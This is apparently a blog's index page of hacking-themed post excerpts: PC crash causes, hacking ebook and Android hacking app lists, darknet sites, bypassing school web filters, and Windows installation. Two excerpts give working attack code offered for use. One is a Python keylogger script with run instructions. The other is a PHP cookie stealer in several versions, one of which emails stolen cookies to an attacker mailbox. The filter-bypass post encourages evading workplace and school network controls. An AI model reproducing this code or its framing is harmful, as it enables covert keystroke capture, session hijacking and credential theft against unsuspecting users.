Skip to main content

Posts

Showing posts with the label Operating System

10 reasons why PCs crash you must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications." You have just been struck by the Blue Screen of Death. Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening? 1 Hardware conflict The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device. For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself. If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries...

How to Create a Keylogger using Notepad

Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file Keylogger Creation Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location  file_log = 'keyloggeroutput.txt'  def OnKeyboardEvent(event):  logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii)  logging.log(10,chr(event.Ascii))  return True  hooks_manager = pyHook.HookManager()  hooks_manager.KeyDown = OnKeyboardEvent  hooks_manager.HookKeyboard()  pythoncom.PumpMessages() 2. Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all...

Best Hacking Books Collection 2017

Cyber security takes big part in Technology. There’s a lot of script kiddie hackers who might get lucky and do mayhem without understanding what they did. Hopefully, there’s hackers with better skills called White Hat hackers. They are truly professionals in cyber security. They do almost the same thing as black hat hackers do, but once they find vulnerability, they report it instead of exploiting it. I made this list of hacking eBooks and you can check it out. If you are cyber security enthusiast, you might wanna take a look at following PDF hacking eBooks. They contain a lot of useful information. So feel free to download and share this article with your friends. Black Belt Hacking & Complete Hacking Book Hackers High School 13 Complete Hacking E-books Penentration Testing With Backtrack 5 A Beginners Guide To Hacking Computer Systems Black Book of Viruses and Hacking Secrets of Super and Professional Hackers Dangerours Google Hacking Database and Attacks Intern...

Browse Blocked Sites Using Google Translate

Hi guys, here i come with an awesome trick to unblock all blocked sites in school,college or workplace. I know that most of all colleges block many websites in their computer systems. They block video browsing sites, trick site, ethical hacking sites, photos sharing sites, magazine sites, games sites, some game blog and even some shopping sites etc.. I don’t know why college computer system administrators are blocking shopping sites, tricks sites and some useful sites. Yes, my college also in this list. They are blocking sites using a website which is called ‘ Cyberoam Network Security Appliances ‘. Cyberoam Network Security Appliances is blocking websites based on the website category. Their database contains only the main category of the sites. Means, they only noting the category of each website and blocking categories. For example, my blog anonymoushackingbytravis.blogspot.in was categorized in shopping category. Lol, I don’t know why we[ anonymoushackingbytravis.blogspot.in ...

Best Darknet Websites 2017

Darknet Websites Links List 2017 – Now After a long time, We came up with a curious topic many of people ask me in E-mail. So Let’s, ready guys, We know that our Internet is full of stuff, sites, search engines, music, torrents, e-commerce and many things. But These are indexed by Search engines like Google, Bing & Yandex. On the other side, there are some of the sites which are hidden from the internet called Darknet Websites List Links or you can say (Deep Web Sites). People can refer these websites as different names like some of search on internet about tor links, onion links, darknet sites etc The main Credit of Deep web is going to Mike Bergman who derived this term in 2000. These websites are not indexed by Standard search engines like Google, Bing & Yandex. So these many of sites are involved in illegal activities to sell drugs, pistols and many of activities. Silk Road is one of the biggest example and a dark web marketplace to sell drugs. It is operated as TO...

15 Best Android Hacking Apps of 2017

In the era of android operating system, It really reduces our workload and we can down many of thing with the android smartphone in just a few clicks. So Guys, on the other hand, there is a black world of android apps that can be used by hackers to do illegal and strange activities. In technical language, there are lots of apps which are used to do hacking and other illegal stuff that against android’s policy. Our purpose is not to promote these apps but aware about these android hacking apps that these apps exist too. Many of android users not aware about these apps cause these are not available on google play store but you can find these apps on the internet freely. You can even search on internet about best android hacking apps and you can easily get these apps. Many of you guys heard about the top best android app of different categories but today we are going to show you the most notorious best android hacking apps available on internet and people are freely using that app ...

Delete Your Online Identity All In One Click

Outlined by two Swedish developers, Wille Dahlbo and Linus Unnebäck, the site says it helps you ‘Clean up your reality’ by gathering every all the records and deleting them. On the off-chance that you ever feel like online life is getting excessively, there might be an answer. Deseat.me permits people to delete their online impression with the click of a button. All we need to is login with your Google account, it searches out all part of the records a client has made on the web. As Deseat.me uses the Google OAuth convention, it implies that it won’t have access to anybody’s login data, the main thing it finds are the accounts you need to delete GOOGLE'S OAUTH PROTOCOL OAuth is an open standard for authorization, regularly utilized as a route for web clients to sign into outsider sites utilizing their Microsoft, Google, Facebook (et cetera) accounts without uncovering their secret key It isn’t ideal, however. Deseat might have the capacity to discover the reco...

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...

Step By Step Guide to Install Windows 10

There are multiple ways to install Windows 10. we are going to discuss some of them here. 1. Using Media Creation Tool Download the tool from here . It will automatically check your system configuration and start downloading the windows 10 from Microsoft server. This tool is an easy to upgrade medium if you are on any previous version of windows. The only drawback of this is you cannot use this tool if your Computer is offline. you can also use this tool to create a installation media to install windows on other computer. 2. Using a Disc Image (ISO File) If you already have a iso file windows to downloaded with you. you can use that to use that to create a window installation media. If not you can download that from here . once downloaded you can use any bootable media creating tool like Rufus . Once downloaded you can select your iso file and removable disk from which you want to install windows. 3. Without Using a Removable disk  If you don't have any flash driv...